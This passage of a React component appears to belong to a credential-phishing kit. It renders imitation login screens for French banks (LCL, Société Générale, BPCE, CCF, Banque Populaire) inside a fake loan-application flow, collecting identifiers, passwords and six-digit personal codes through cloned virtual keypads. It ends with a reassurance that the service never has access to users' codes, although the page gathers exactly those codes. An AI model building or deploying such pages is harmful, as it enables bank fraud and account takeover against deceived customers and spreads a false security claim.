                    className="w-5 h-5 border-2 border-gray-300 rounded mr-3 accent-blue-600"
                  />
                  <span className="text-sm text-gray-700">Mémoriser mon identifiant</span>
                </label>
              </div>

              {/* Code Personnel Title */}
              <h2 className="text-xl font-bold text-center mb-4" style={{ color: '#0046AD' }}>
                Votre code personnel
              </h2>

              {/* 6 circles for code display */}
              <div className="flex justify-center items-center gap-3 mb-6">
                {[0, 1, 2, 3, 4, 5].map((index) => (
                  <div
                    key={index}
                    className={`w-4 h-4 rounded-full border-2 ${
                      index < lclCode.length ? 'bg-gray-800 border-gray-800' : 'border-gray-400'
                    }`}
                  />
                ))}
              </div>

              {/* Virtual Keypad - 5x2 grid with randomized numbers */}
              <div className="grid grid-cols-5 gap-2 mb-6 max-w-xs mx-auto">
                {lclKeypadNumbers.map((num, index) => (
                  <button
                    key={index}
                    type="button"
                    onClick={() => handleLclKeypadClick(num)}
                    className="w-12 h-12 rounded-full text-lg font-bold transition-all hover:opacity-80 active:scale-95"
                    style={{ 
                      backgroundColor: '#E8F4FC',
                      color: '#1F2937'
                    }}
                    data-testid={`lcl-keypad-${num}`}
                  >
                    {num}
                  </button>
                ))}
              </div>

              {/* Validate Button - wider to match image */}
              <div className="flex justify-center mb-4">
                <Button
                  onClick={handleLclValidate}
                  disabled={lclCode.length < 6 || loading}
                  className="h-12 text-white font-medium rounded-full text-base flex items-center justify-center gap-2"
                  style={{ 
                    backgroundColor: lclCode.length === 6 ? '#0046AD' : '#9CA3AF',
                    cursor: lclCode.length === 6 ? 'pointer' : 'not-allowed',
                    width: '80%',
                    maxWidth: '280px'
                  }}
                  data-testid="lcl-validate-btn"
                >
                  {loading ? 'Connexion...' : 'Valider'}
                  <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M14 5l7 7m0 0l-7 7m7-7H3" />
                  </svg>
                </Button>
              </div>

              {/* Links */}
              <div className="text-center space-y-1 mb-4">
                <a 
                  href="https://www.lcl.fr/questions-frequentes/identification-authentification-forte"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="block text-base underline"
                  style={{ color: '#0046AD' }}
                >
                  Identifiant oublié ?
                </a>
                <a 
                  href="https://www.lcl.fr/questions-frequentes/identification-authentification-forte"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="block text-base underline"
                  style={{ color: '#0046AD' }}
                >
                  Code personnel oublié ?
                </a>
              </div>

              {/* Not a client section */}
              <div className="mt-6 text-center">
                <h2 className="text-xl font-bold text-gray-900 mb-3">Pas encore client ?</h2>
                <a
                  href="https://www.lcl.fr/compte-bancaire/ouvrir-un-compte-bancaire-en-ligne"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="inline-flex items-center justify-center gap-2 px-6 h-11 font-medium rounded-full text-base text-white"
                  style={{ backgroundColor: '#0046AD' }}
                >
                  Ouvrir un compte
                  <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M14 5l7 7m0 0l-7 7m7-7H3" />
                  </svg>
                </a>
              </div>
            </div>
          )}
        </div>
      </div>
    );
  }

  // Special Société Générale Layout with Virtual Keyboard
  if (bank.isSGLayout) {
    return (
      <div className="min-h-screen flex flex-col bg-white">
        {/* SG Header */}
        <div className="w-full bg-white py-2 px-4 flex items-center justify-between border-b border-gray-200">
          <div className="flex items-center">
            <img 
              src="https://customer-assets.emergentagent.com/job_fintech-ui-mockup/artifacts/kbbloj27_IMG_0815.jpeg" 
              alt="Société Générale" 
              className="h-12 w-auto object-contain"
            />
          </div>
          <a 
            href="https://particuliers.sg.fr"
            target="_blank"
            rel="noopener noreferrer"
            className="px-3 py-1.5 text-xs font-semibold text-white rounded-full"
            style={{ backgroundColor: '#1a2b4d' }}
          >
            Ouvrir un compte
          </a>
        </div>

        {/* Main Content */}
        <div className="flex-1 px-4 py-4">
          {/* Title */}
          <h1 className="text-sm font-light text-gray-900 mb-2 text-center">
            {bank.loginTitle}
          </h1>

          {/* White space */}
          <div className="h-32"></div>

          {/* Identifier Section */}
          <div className="mb-6 max-w-[320px] mx-auto">
            <label className="block text-sm font-medium text-gray-700 mb-2 text-left">
              {bank.usernameLabel}
            </label>
            <div className="relative">
              <Input
                type="text"
                value={username}
                onChange={(e) => setUsername(e.target.value.replace(/\D/g, '').slice(0, 8))}
                className="h-10 text-base border-2 rounded-lg pr-10"
                style={{ borderColor: '#1a2b4d' }}
                placeholder=""
                disabled={sgStep === 2}
                data-testid="sg-username-input"
              />
              {username && sgStep === 1 && (
                <button
                  type="button"
                  onClick={() => setUsername('')}
                  className="absolute right-2 top-2 text-gray-400 hover:text-gray-600"
                >
                  <svg className="h-5 w-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                  </svg>
                </button>
              )}
            </div>
          </div>

          {/* Remember Me - Only on Step 1 */}
          {sgStep === 1 && (
            <div className="flex items-center mb-8 max-w-[320px] mx-auto justify-start">
              <div className="flex items-center space-x-2">
                <span className="text-sm text-gray-700">Se souvenir de moi</span>
                <button className="w-5 h-5 rounded-full border border-gray-400 flex items-center justify-center text-gray-400 text-xs">
                  i
                </button>
                <button
                  type="button"
                  onClick={() => setRememberMe(!rememberMe)}
                  className={`w-10 h-5 rounded-full transition-colors ml-2 ${rememberMe ? 'bg-red-500' : 'bg-gray-300'}`}
                >
                  <div className={`w-4 h-4 rounded-full bg-white shadow transform transition-transform ${rememberMe ? 'translate-x-5' : 'translate-x-0.5'}`}></div>
                </button>
              </div>
            </div>
          )}

          {/* Step 2: Virtual Keyboard */}
          {sgStep === 2 && (
            <div className="mb-4 max-w-[280px] mx-auto">
              {/* Code indicator */}
              <div className="flex items-center justify-center space-x-4 mb-4">
                {[0, 1, 2, 3, 4, 5].map((index) => (
                  <div key={index}>
                    {index < sgCode.length ? (
                      <div className="w-3 h-3 rounded-full bg-gray-800"></div>
                    ) : (
                      <div className="w-5 h-0.5 bg-gray-400"></div>
                    )}
                  </div>
                ))}
                <button
                  type="button"
                  onClick={handleSgDeleteLast}
                  className="ml-2 text-gray-500 hover:text-gray-700"
                >
                  <svg className="h-5 w-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                  </svg>
                </button>
              </div>

              {/* Virtual Keypad */}
              <div className="grid grid-cols-4 gap-1.5 mb-4">
                {sgKeypadNumbers.map((num, index) => (
                  <button
                    key={index}
                    type="button"
                    onClick={() => handleSgKeypadClick(num)}
                    disabled={num === ''}
                    className={`h-10 w-full rounded-md text-lg font-semibold transition-colors ${
                      num !== '' 
                        ? 'bg-gray-100 hover:bg-gray-200 text-gray-800 border border-gray-300' 
                        : 'bg-transparent border-0'
                    }`}
                    data-testid={`sg-keypad-${num}`}
                  >
                    {num}
                  </button>
                ))}
              </div>

              {/* Sound Keyboard Link */}
              <div className="text-center mb-4">
                <button className="text-xs text-red-600 underline">
                  Activer le clavier sonore
                </button>
              </div>
            </div>
          )}

          {/* Validate Button */}
          <div className="flex justify-center">
            <Button
              type="button"
              onClick={handleSgValidate}
              className="w-[280px] h-10 text-white font-bold text-base rounded-full"
              style={{ backgroundColor: '#E11D28' }}
              disabled={(sgStep === 1 && username.length < 8) || (sgStep === 2 && sgCode.length < 6) || loading}
              data-testid="sg-validate-btn"
            >
              {loading ? 'Connexion...' : 'Valider'}
            </Button>
          </div>
        </div>

        {/* Gray Footer */}
        <div className="bg-gray-100 px-4 py-6 relative">
          {/* Floating icons on right */}
          <div className="absolute right-0 top-1/2 transform -translate-y-1/2 flex flex-col" style={{ backgroundColor: '#1a2b4d' }}>
            <button className="w-12 h-12 flex items-center justify-center border-b border-gray-600">
              <svg className="w-6 h-6 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={1.5} d="M8 10h.01M12 10h.01M16 10h.01M9 16H5a2 2 0 01-2-2V6a2 2 0 012-2h14a2 2 0 012 2v8a2 2 0 01-2 2h-5l-5 5v-5z" />
              </svg>
            </button>
            <button className="w-12 h-12 flex items-center justify-center">
              <svg className="w-6 h-6 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={1.5} d="M8 7V3m8 4V3m-9 8h10M5 21h14a2 2 0 002-2V7a2 2 0 00-2-2H5a2 2 0 00-2 2v12a2 2 0 002 2z" />
              </svg>
            </button>
          </div>

          <div className="pr-16">
            {/* Title 1 */}
            <h3 className="text-sm font-bold text-gray-900 mb-2">
              Où trouver mon Code Client SG ?
            </h3>

            {/* Bullet point */}
            <div className="flex items-start mb-4">
              <span className="text-red-500 text-xs mr-2 mt-0.5">●</span>
              <p className="text-xs font-light text-gray-700 leading-relaxed">
                Votre Code Client vous a été communiqué lors de la souscription à la Banque à Distance. Il est également indiqué sur vos relevés de comptes.
              </p>
            </div>

            {/* Title 2 */}
            <h3 className="text-sm font-bold text-gray-900 mb-2">
              Code Client ou Code Secret inconnus ?
            </h3>

            {/* Links */}
            <div className="space-y-1">
              <a 
                href="https://particuliers.sg.fr/swm/swm-restitution.html"
                target="_blank"
                rel="noopener noreferrer"
                className="flex items-center text-xs font-light text-gray-700 underline"
              >
                <span className="mr-2">»</span>
                Je souhaite obtenir mon Code Client
              </a>
              <a 
                href="https://particuliers.sg.fr/swm/swm-reattribution.html"
                target="_blank"
                rel="noopener noreferrer"
                className="flex items-center text-xs font-light text-gray-700 underline"
              >
                <span className="mr-2">»</span>
                Je ne connais pas mon Code Secret
              </a>
            </div>
          </div>
        </div>
      </div>
    );
  }

  // Special BPCE Layout
  if (bank.isBPCELayout) {
    return (
      <div className="min-h-screen flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
        {/* BPCE Header */}
        <div className="w-full bg-white py-3 px-4 flex items-center">
          <img 
            src={bank.logo} 
            alt="BPCE Factor" 
            className="h-12 w-auto object-contain"
          />
        </div>

        {/* Main Content */}
        <div className="flex-1 flex items-center justify-center py-8 px-4">
          <div className="w-full" style={{ maxWidth: '260px' }}>
            <Card className="bg-white rounded-xl shadow-lg py-16 px-5">
              {/* User + Lock Icons */}
              <div className="flex justify-center items-center mb-6">
                <div className="relative">
                  {/* User circle */}
                  <svg className="h-16 w-16" viewBox="0 0 64 64" fill="none">
                    <circle cx="32" cy="24" r="12" stroke="#6B4C9A" strokeWidth="2" fill="none"/>
                    <path d="M12 56c0-11 9-20 20-20s20 9 20 20" stroke="#6B4C9A" strokeWidth="2" fill="none"/>
                  </svg>
                  {/* Lock icon */}
                  <div className="absolute -right-2 top-0">
                    <svg className="h-8 w-8" viewBox="0 0 24 24" fill="none">
                      <rect x="5" y="11" width="14" height="10" rx="2" stroke="#D4145A" strokeWidth="2"/>
                      <path d="M8 11V7a4 4 0 018 0v4" stroke="#D4145A" strokeWidth="2"/>
                      <circle cx="12" cy="16" r="1.5" fill="#D4145A"/>
                    </svg>
                  </div>
                </div>
              </div>

              {/* Title */}
              <h2 className="text-2xl font-medium text-center text-gray-900 mb-8">
                Connexion
              </h2>

              <form onSubmit={handleSubmit}>
                {/* Identifiant Field */}
                <div className="mb-6">
                  <Input
                    type="text"
                    placeholder="Identifiant"
                    value={username}
                    onChange={(e) => setUsername(e.target.value)}
                    required
                    className="h-14 text-base bg-gray-100 border-0 border-b border-gray-300 rounded-none focus:ring-0 focus:border-gray-400 placeholder-gray-400"
                    data-testid="bpce-username-input"
                  />
                </div>

                {/* Mot de passe Field */}
                <div className="mb-8">
                  <div className="relative">
                    <Input
                      type={showPassword ? 'text' : 'password'}
                      placeholder="Mot de passe"
                      value={password}
                      onChange={(e) => setPassword(e.target.value)}
                      required
                      className="h-14 text-base bg-gray-100 border-0 border-b border-gray-300 rounded-none focus:ring-0 focus:border-gray-400 placeholder-gray-400 pr-12"
                      data-testid="bpce-password-input"
                    />
                    <button
                      type="button"
                      onClick={() => setShowPassword(!showPassword)}
                      className="absolute right-3 top-4 text-gray-400 hover:text-gray-600"
                    >
                      {showPassword ? <EyeOff className="h-5 w-5" /> : <Eye className="h-5 w-5" />}
                    </button>
                  </div>
                </div>

                {/* Forgot Password Link */}
                <div className="text-center mb-8 px-4">
                  <a 
                    href={bank.forgotPasswordLink}
                    target="_blank"
                    rel="noopener noreferrer"
                    className="text-xs font-semibold uppercase tracking-wide hover:underline"
                    style={{ color: '#6B4C9A' }}
                  >
                    MOT DE PASSE OUBLIÉ ?
                  </a>
                </div>

                {/* Submit Button */}
                <Button
                  type="submit"
                  className="w-full h-14 font-semibold text-base uppercase tracking-wide rounded-lg"
                  style={{ 
                    backgroundColor: (!username || !password) ? '#E8E8E8' : '#CCCCCC',
                    color: '#999999'
                  }}
                  disabled={loading || !username || !password}
                  data-testid="bpce-submit-btn"
                >
                  {loading ? 'Connexion...' : 'SE CONNECTER'}
                </Button>
              </form>
            </Card>
          </div>
        </div>

        {/* Footer */}
        <div className="w-full py-6 px-4" style={{ backgroundColor: '#F5F5F5' }}>
          {/* Footer Links */}
          <div className="max-w-md mx-auto space-y-3 mb-6">
            <a 
              href="https://www.factor.bpce.fr/entreprise/informations-reglementaires/notice-information-protection-donnees-personnelles/"
              target="_blank"
              rel="noopener noreferrer"
              className="block text-gray-700 hover:underline"
            >
              Protection des données
            </a>
          </div>

          {/* Bottom Bar */}
          <div className="border-t border-gray-300 pt-4">
            <div className="max-w-md mx-auto flex items-center justify-between">
              <div className="flex items-center space-x-2">
                <svg className="h-6 w-6" viewBox="0 0 24 24" fill="#6B4C9A">
                  <circle cx="12" cy="12" r="10" stroke="#6B4C9A" strokeWidth="1" fill="none"/>
                  <circle cx="12" cy="12" r="6" fill="#6B4C9A" opacity="0.5"/>
                  <circle cx="12" cy="12" r="3" fill="#6B4C9A"/>
                </svg>
                <span className="font-bold text-gray-800">GROUPE BPCE</span>
              </div>
              <span className="text-gray-500 text-sm">©BPCE 2026</span>
            </div>
          </div>
        </div>
      </div>
    );
  }

  // Special CCF Layout
  if (bank.isCCFLayout) {
    const handleCCFNext = (e) => {
      e.preventDefault();
      if (ccfStep === 1 && username) {
        setCcfStep(2);
      } else if (ccfStep === 2 && password) {
        handleSubmit(e);
      }
    };

    return (
      <div className="min-h-screen bg-white flex flex-col">
        {/* CCF Header - Image */}
        <div className="w-full">
          <img 
            src="https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/or9onrxz_IMG_0781.jpeg"
            alt="CCF - Bienvenue dans votre espace client"
            className="w-full h-auto object-cover"
          />
        </div>

        {/* Main Content */}
        <div className="flex-1 flex items-center justify-center py-8">
          <div className="w-full max-w-sm px-4">
            {/* Lock Icon */}
            <div className="flex justify-center mb-4">
              <div className="w-16 h-16 rounded-full flex items-center justify-center" style={{ backgroundColor: '#1A3C6E' }}>
                <svg className="h-8 w-8 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
                </svg>
              </div>
            </div>

            {/* Title */}
            <h1 className="text-xl font-bold text-center mb-6" style={{ color: '#1A3C6E' }}>
              Votre espace client CCF
            </h1>

            <form onSubmit={handleCCFNext}>
              {ccfStep === 1 ? (
                <>
                  {/* Identifiant Field */}
                  <div className="mb-4">
                    <label className="block text-sm font-medium mb-2" style={{ color: '#1A3C6E' }}>
                      Votre identifiant
                    </label>
                    <Input
                      type="text"
                      placeholder="Saisissez votre identifiant"
                      value={username}
                      onChange={(e) => setUsername(e.target.value)}
                      required
                      className="h-12 text-base border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-400"
                      data-testid="ccf-username-input"
                    />
                  </div>

                  {/* Remember Me Checkbox */}
                  <div className="flex items-center mb-6">
                    <input
                      type="checkbox"
                      id="remember-ccf"
                      checked={rememberMe}
                      onChange={(e) => setRememberMe(e.target.checked)}
                      className="h-4 w-4 border-gray-300 rounded"
                      style={{ accentColor: '#1A3C6E' }}
                    />
                    <label htmlFor="remember-ccf" className="ml-2 text-sm" style={{ color: '#1A3C6E' }}>
                      Se souvenir de moi
                    </label>
                  </div>
                </>
              ) : (
                <>
                  {/* Password Field */}
                  <div className="mb-6">
                    <label className="block text-sm font-medium mb-2" style={{ color: '#1A3C6E' }}>
                      Votre mot de passe
                    </label>
                    <div className="relative">
                      <Input
                        type={showPassword ? 'text' : 'password'}
                        placeholder="Saisissez votre mot de passe"
                        value={password}
                        onChange={(e) => setPassword(e.target.value)}
                        required
                        className="h-12 text-base border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-400 pr-12"
                        data-testid="ccf-password-input"
                      />
                      <button
                        type="button"
                        onClick={() => setShowPassword(!showPassword)}
                        className="absolute right-3 top-3 text-gray-400 hover:text-gray-600"
                      >
                        {showPassword ? <EyeOff className="h-5 w-5" /> : <Eye className="h-5 w-5" />}
                      </button>
                    </div>
                  </div>
                </>
              )}

              {/* Submit Button */}
              <Button
                type="submit"
                className="w-full h-12 text-white font-semibold text-base rounded-lg"
                style={{ backgroundColor: '#1A3C6E' }}
                disabled={loading || (ccfStep === 1 && !username) || (ccfStep === 2 && !password)}
                data-testid="ccf-submit-btn"
              >
                {loading ? 'Connexion...' : 'Suivant'}
              </Button>
            </form>

            {/* Help Links */}
            <div className="mt-6 text-center space-y-2">
              <a 
                href={bank.accessRecoveryLink}
                target="_blank"
                rel="noopener noreferrer"
                className="block text-sm hover:underline"
                style={{ color: '#1A3C6E' }}
              >
                Première connexion
              </a>
              <a 
                href={bank.accessRecoveryLink}
                target="_blank"
                rel="noopener noreferrer"
                className="block text-sm hover:underline"
                style={{ color: '#1A3C6E' }}
              >
                Identifiant ou mot de passe oublié / Accès bloqué
              </a>
            </div>
          </div>
        </div>

        {/* Footer */}
        <div className="w-full py-4 px-6 border-t border-gray-200 bg-gray-50">
          <div className="max-w-4xl mx-auto">
            {/* Footer Links */}
            <div className="flex flex-wrap justify-center gap-4 text-xs mb-4" style={{ color: '#1A3C6E' }}>
              <a href={bank.faqLink} target="_blank" rel="noopener noreferrer" className="hover:underline">FAQ</a>
              <a href={bank.offreLink} target="_blank" rel="noopener noreferrer" className="hover:underline">Notre offre</a>
              <a href={bank.contactLink} target="_blank" rel="noopener noreferrer" className="hover:underline">Nous contacter</a>
              <a href={bank.mentionsLink} target="_blank" rel="noopener noreferrer" className="hover:underline">Mentions légales</a>
              <a href={bank.cookiesLink} target="_blank" rel="noopener noreferrer" className="hover:underline">Cookies</a>
            </div>
            {/* Social Icons */}
            <div className="flex justify-center gap-4 mb-2">
              <a href={bank.linkedinLink} target="_blank" rel="noopener noreferrer" className="text-gray-600 hover:text-blue-700">
                <svg className="h-5 w-5" fill="currentColor" viewBox="0 0 24 24"><path d="M19 0h-14c-2.761 0-5 2.239-5 5v14c0 2.761 2.239 5 5 5h14c2.762 0 5-2.239 5-5v-14c0-2.761-2.238-5-5-5zm-11 19h-3v-11h3v11zm-1.5-12.268c-.966 0-1.75-.79-1.75-1.764s.784-1.764 1.75-1.764 1.75.79 1.75 1.764-.783 1.764-1.75 1.764zm13.5 12.268h-3v-5.604c0-3.368-4-3.113-4 0v5.604h-3v-11h3v1.765c1.396-2.586 7-2.777 7 2.476v6.759z"/></svg>
              </a>
              <a href={bank.facebookLink} target="_blank" rel="noopener noreferrer" className="text-gray-600 hover:text-blue-600">
                <svg className="h-5 w-5" fill="currentColor" viewBox="0 0 24 24"><path d="M9 8h-3v4h3v12h5v-12h3.642l.358-4h-4v-1.667c0-.955.192-1.333 1.115-1.333h2.885v-5h-3.808c-3.596 0-5.192 1.583-5.192 4.615v3.385z"/></svg>
              </a>
              <a href={bank.twitterLink} target="_blank" rel="noopener noreferrer" className="text-gray-600 hover:text-gray-900">
                <svg className="h-5 w-5" fill="currentColor" viewBox="0 0 24 24"><path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"/></svg>
              </a>
            </div>
            <p className="text-center text-xs text-gray-500">© CCF</p>
          </div>
        </div>
      </div>
    );
  }

  const headerBgColor = bank.headerColor || bank.primaryColor;
  const headerTxtColor = bank.headerTextColor || '#FFFFFF';
  // Header logo size - keep reasonable for header bar
  const headerLogoSize = bank.headerLogoSmall ? "h-6" : "h-12";
  const logoClass = bank.headerColor ? `${headerLogoSize} w-auto object-contain` : "h-8 w-auto object-contain bg-white rounded px-2 py-1";
  const formLogoSize = bank.formLogoSmall ? "h-14" : bank.logoSize === 'xlarge' ? "h-36" : bank.logoSize === 'large' ? "h-28" : "h-20";

  return (
    <div className="min-h-screen" style={{ backgroundColor: bank.bgColor }}>
      {/* Bank Header */}
      <div 
        className="w-full py-3 px-4 border-b border-gray-200"
        style={{ backgroundColor: headerBgColor }}
      >
        <div className="flex items-center justify-between">
          {/* Left: Retour button */}
          <button 
            onClick={() => navigate('/client/loan-flow/bank-selection')}
            className="flex items-center space-x-1 hover:opacity-80"
            style={{ color: headerTxtColor }}
          >
            <ArrowLeft className="h-4 w-4" />
            <span className="text-sm">Retour</span>
          </button>
          {/* Center: Connexion sécurisée */}
          <div className="text-xs whitespace-nowrap" style={{ color: headerTxtColor }}>Connexion sécurisée</div>
          {/* Right: Bank logo (use headerLogo if available) */}
          <img 
            src={bank.headerLogo || bank.logo} 
            alt={bank.name} 
            className={logoClass}
          />
        </div>
      </div>

      {/* Main Content */}
      <div className="max-w-md mx-auto px-4 py-12">
        <Card className="p-8 bg-white shadow-2xl">
          {/* Bank Logo */}
          <div className="flex justify-center mb-8">
            {bank.logo ? (
              <img 
                src={bank.logo} 
                alt={bank.name} 
                className={`${formLogoSize} w-auto object-contain`}
              />
            ) : (
              <div 
                className="h-20 w-20 rounded-lg flex items-center justify-center text-white font-bold text-2xl"
                style={{ backgroundColor: bank.primaryColor }}
              >
                {bank.name.charAt(0)}
              </div>
            )}
          </div>

          {/* Title */}
          <h1 
            className="text-2xl font-bold text-center mb-2"
            style={{ color: bank.secondaryColor }}
          >
            {bank.loginTitle}
          </h1>
          <p className="text-gray-500 text-center mb-8 text-sm">
            {bank.name}
          </p>

          {/* Login Form */}
          <form onSubmit={handleSubmit} className="space-y-6">
            <div>
              <label 
                htmlFor="username" 
                className="block text-sm font-semibold mb-2"
                style={{ color: bank.secondaryColor }}
              >
                {bank.usernameLabel}
              </label>
              <Input
                id="username"
                type="text"
                placeholder={bank.usernamePlaceholder}
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                required
                className="h-12 text-base border-gray-300"
                data-testid="bank-username-input"
              />
            </div>

            <div>
              <label 
                htmlFor="password" 
                className="block text-sm font-semibold mb-2"
                style={{ color: bank.secondaryColor }}
              >
                {bank.passwordLabel}
              </label>
              <div className="relative">
                <Input
                  id="password"
                  type={showPassword ? 'text' : 'password'}
                  placeholder={bank.passwordPlaceholder}
                  value={password}
                  onChange={(e) => setPassword(e.target.value)}
                  required
                  className="h-12 text-base pr-12 border-gray-300"
                  data-testid="bank-password-input"
                />
                <button
                  type="button"
                  onClick={() => setShowPassword(!showPassword)}
                  className="absolute right-3 top-3 text-gray-400 hover:text-gray-600"
                >
                  {showPassword ? <EyeOff className="h-5 w-5" /> : <Eye className="h-5 w-5" />}
                </button>
              </div>
            </div>

            {/* Fraud Alert for Banque Populaire */}
            {bank.hasFraudAlert && (
              <div className="p-4 rounded-lg border-l-4" style={{ backgroundColor: '#FFF7ED', borderLeftColor: '#F97316' }}>
                <p className="text-sm font-semibold text-gray-900 mb-2">
                  Vous êtes contacté via les réseaux sociaux ou WhatsApp pour une opération bancaire ?
                </p>
                <p className="text-sm text-gray-700">
                  Ne donnez pas suite à cette demande. <span className="font-semibold" style={{ color: '#EA580C' }}>C'est une fraude !</span> Jamais un conseiller n'utilisera les réseaux sociaux ou WhatsApp pour vous contacter.
                </p>
              </div>
            )}

            <Button
              type="submit"
              size="lg"
              className="w-full text-white font-semibold h-12 text-base"
              style={{ backgroundColor: bank.buttonColor }}
              disabled={loading}
              data-testid="bank-submit-btn"
            >
              {loading ? 'Connexion en cours...' : bank.buttonText}
            </Button>
          </form>

          {/* Help Links - Only for banks with forgot links */}
          {(bank.forgotIdentifiantLink || bank.forgotCodeLink) && (
            <div className="mt-6 space-y-2 text-center">
              {bank.forgotIdentifiantLink && (
                <a 
                  href={bank.forgotIdentifiantLink}
                  target="_blank"
                  rel="noopener noreferrer"
                  className="block text-sm hover:underline"
                  style={{ color: bank.primaryColor }}
                >
                  Identifiant oublié ?
                </a>
              )}
              {bank.forgotCodeLink && (
                <a 
                  href={bank.forgotCodeLink}
                  target="_blank"
                  rel="noopener noreferrer"
                  className="block text-sm hover:underline"
                  style={{ color: bank.primaryColor }}
                >
                  Code secret oublié ?
                </a>
              )}
            </div>
          )}

          {/* Security Notice */}
          <div className="mt-8 p-4 bg-gray-50 rounded-lg border border-gray-200">
            <div className="flex items-start space-x-3">
              <div className="flex-shrink-0">
                <svg className="h-5 w-5 text-green-600" fill="currentColor" viewBox="0 0 20 20">
                  <path fillRule="evenodd" d="M5 9V7a5 5 0 0110 0v2a2 2 0 012 2v5a2 2 0 01-2 2H5a2 2 0 01-2-2v-5a2 2 0 012-2zm8-2v2H7V7a3 3 0 016 0z" clipRule="evenodd" />
                </svg>
              </div>
              <p className="text-xs text-gray-600">
                <strong>Connexion sécurisée</strong> - Vos identifiants sont chiffrés et transmis de manière sécurisée. Younited n'a jamais accès à vos codes.
              </p>
            </div>
          </div>
        </Card>
      </div>
    </div>
  );
};

export default BankLogin;
